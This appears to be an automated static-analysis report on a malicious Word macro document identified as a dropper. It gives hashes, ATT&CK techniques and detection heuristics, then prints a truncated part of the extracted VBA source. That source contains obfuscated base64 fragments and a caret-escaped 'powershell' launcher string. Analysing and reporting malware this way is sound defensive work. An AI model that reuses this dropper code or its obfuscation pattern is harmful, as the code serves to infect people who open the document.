Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 97dd6f23f3076074…

MALICIOUS

Office (OLE)

81.5 KB Created: 2017-10-31 08:05:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: ec6fb801d6ecedb324ee0bf1e23dd5e5 SHA-1: 301f574745cab07508658a1ad42ba3c70cd591bb SHA-256: 97dd6f23f30760741698234b1fe42fdb9f2cb4e1ba37ca2c653dcecdc4c6d710
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a Shell() command, which is highly indicative of downloading and executing a second-stage payload. The presence of the 'Doc.Dropper.Agent-6361382-0' ClamAV signature further supports its role as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6361382-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6361382-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11695 bytes
SHA-256: c4a5a13b1f632c94275923a392678767fcbe63038dce7e97726206486b967f06
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 29 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "juuOHkBVz"
Function nNvOoPmVs()

WtFvFTY = Mid("IT55XXP8JFT9XVK25BWDAANAAgACwAIAAxADEANgAsADEAMQA2ACwAMQAxADIAIAAsACAANQA4ACAALAA0ADcAIAAsACAANAA3ACAALAAxADEAMgAgACwAIAAxADAAOAAsADkANwAsACAAMQAxADAAIAAsACAAMQAxADEAIAAsADkAOQAsACAAMQAwADEAIAAsACAAMQAxADQAIAAsACAAMQAxADEALAA0ADYALAAgADkAOQAgACwAMQANPZ4WT1KXVNTWKXGXI", 20, 230)
mWCqrdt = WtFvFTY

wswWuvB = Mid("ZQZSYVXBset %ctBLLaAtR%=ASdNIucqv&&set %nNvOoPmVs%=p^o^w^e^r^s&&set %CjSkFbRKI%=biWdJBusi&&set %kpElqPUYr%=he^l^l&&set %qcPvGAtJu%=UODWccDO4", 9, 129)
kjilvShrzz = wswWuvB

khLhEMoWLnM = Mid("MUWYAMQAxADcAIAAsACAAMQAxADQALAAgADEAMAA4ACwAMQAxADUAIAAsADMAMgAgACwAIAA2ADEALAAgADMAMgAgACwAMwA5ACAALAAxADAANAAsACAAMQAxADYALAAxADEANgAsACAAMQAxADIALAAgADUAOAAgACwAIAA0ADcALAA0ADcAIAAsACAAOQA4ACwAMQAwADEAIAAs6AQHAY1C2ILJ597M348K52YDFGT", 5, 205)
ALUbrksMdkf = khLhEMoWLnM

uTQCPzBwGun = Mid("ZYGD44YRAALAAgADEAMAA1ACwAMQAxADEALAAxADEAMAAsADQANgAsACAANwA3ACwAIAAxADAAMQAsACAAMQAxADUAIAAsACAAMLYBFSSM4E", 9, 91)
WqzqOuXPS = uTQCPzBwGun

zZfXD = Mid("XKZTJL4ACAALAAxADEAMgAgACwANQA4ACwAIAA0ADcALAAgADQANwAsADEAMAAyACAALAAgADkANwAgACwAMQAwADgAIAAsADEAMAA3ACwAOQA3ACAALAAxADAAOAAgACwAIAA0ADYALAAxADAAMAAsADEAMAAxACAALAA0ADcALAAgADEAMAA3D9U9", 8, 176)
NWMEdrh = zZfXD

bpmWcjajown = Mid("DFR8WNNIP9UVDMANgAgACwAIAAxADEANwAsADEAMQA0ACAALAAxADAAOAAsACAAMwAyACwAIAAxADAANQAsADEAMQAwACwAIAAzADIAPY9", 13, 91)
LfSZC = bpmWcjajown

YKhjPEXiXVc = Mid("970WA59RZ69GJNXCSWYM6SCOAAxADEANgAsADMAMgAsADgAMwAgACwAIAAxADIAMQAsADEAMQ8EAWJ1SPT1TFMVW", 25, 49)
qoUILfaUmN = YKhjPEXiXVc

hqjZmTM = Mid("ATZ8P2T5RWNAAzACAALAAxADEAMgAgACwAIAAxADAAOAAgACwAIAAxADAANQAsADEAMQA2ACwANAAwACwAIAAzADkALAA0ADQAIAAsACAAMwA5ACwAIAA0ADEAIAAsADUAOQAgACwAMwA2ACAALAAgADEAMQAwACwAOQA3ACAALAAgADEAMAA3A4A7", 12, 170)
zsmXnt = hqjZmTM

dIpwLDDNZ = Mid("L2EAMQA0ACAALAAgADEAMQAxACAALAAgADkAOQAsADEAMAAxACwAMQAxADUALAAxADEANQAgACwAIAAzADIAIAAsACAAMwA2ACwAIAAxADEAMgAsADkANwAgACwAMQAxADYAIAAsADEAMAA0ACwANQA5ACwAOQA4ACAALAAgADEAMQA0ACwAIAAxADAAMQAsACAAOQA3ACwAMQAwADcAIAAsADUAOQAsADEAMgA1ACwAOQA5ACAALAA5ADcALAAxADEANgAgACwAIAA5ADkAIAAsADEAMAA0ACAALAAgO186TJSMBAB0", 3, 294)
cESSwCWS = dIpwLDDNZ

YWhoiMFO = Mid("C8xADAAMQAgACwAIAA5ADkALAAgADEAMQA2ACAALAAgADMAMgAsACAAMQAxADQALAA5ADcALAAgADEAMQAwACAALAAgADEAMAAwACwAMQAxADEALAAxADAAOQAsADUAOQAgACwAIAAzADYAIAAsACARGQBJWH1LAK289A65Y9", 3, 148)
wFHaGvk = YWhoiMFO

jjGOvOM = Mid("75ACwAIAAxADAAMQAsACAAMwAyACAALAAgADYAMQAsACAAMwAyACAALAAgADMANgAsADEAMQA0ACwAOQA3A0LFPI5YH95LCYT2T", 2, 82)
hJEZGQv = jjGOvOM

uCuXE = Mid("CKNAgADEAMAA1ACwAIAAxADEAMAAsACAAMQAwADMAIAAsADQAMAAsACAANAAxACwANAA0ACwAMwAyACwAIAAzADYALAAxADEAMgAsACAAOQA3ACwAIAAxADEANgAsADEAMAA0ACwAIAA0ADEALAAgADUAOQAsADgAMwAgACwAMQAxADYAIAAsADkANwAsACAAMQAxADQAIAAsACAAMQAxADYAIAAsADQANQAgACwAIAA4ADAAIAAsAD58D27M8T6W00UOZV", 4, 244)
sJGjnX = uCuXE

iYpHrzbT = Mid("5AbwByAEUAYQBjAEgAewAgACgAIABbAEkAbgBUAF0AJABfACAALQBBAFMAWwBjAGgAYQByAF0AKQB9ACkALQBKAE8AaQBOACcAJwApACAAWVIU5T65JEYMXKLRBO9TUTJXKD0C6NEV4U1H6W", 2, 105)
EMJjs = iYpHrzbT

lluBDrJ = Mid("JX9BHN3YT4QAxADIALAA1ADgAIAAsADQANwAgACwANAA3ACAALAAgADEAMQA2ACwAIAAxADEANQAgACwAIAAxADEAOAAgACwAMQAxADkALAAgADEAMAAxACwAMQAxADAALAAxADAANwAgACwAIAAxADAANAAsADEAMAAxACAALAAxADAANQAsACAAMQAwADkALAAgADQANgAgACwAMQAwADAAIAAsACAAMQAwADEALAAgADQAXA", 11, 231)
zGpWmWUtDt = lluBDrJ

UXdQK = Mid("9FN8ANAA2ACAALAA2ADgALAAgADEAMQAxACwAIAAxADEAOQAsACAAMQAxADAAIAAsADEAMAA4ACAALAAxADEAMQAsACXOVQIIYZB8RMZHOKJAX8VQ9H", 5, 87)
aFDHkzw = UXdQK

olquIDUOQOs = Mid("XAA0ADQALAAgADEAMAA0ACAALAAgADEAMQA2ACwAMQAxADYALAAxADEAMgAsADUAOAAsACAANAA3ACAALAA0ADcALAAxADAAMgAgACwAMQAxADQALAAgADEAMAAxACwAMQAwADEAIAAsADEAMAA3ACAALAAxADAAOQAsADEAMQAxACwAIAAxADAAMQAsADEAMQA0ACwAMQAwADkALAAgADkANwAsADEAML98JHPSRBIP0W1DCBSADTYP260WJX", 2, 224)
LkfrVjkuo = olquIDUOQOs

fXnVcErYSZv = Mid("OACAA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.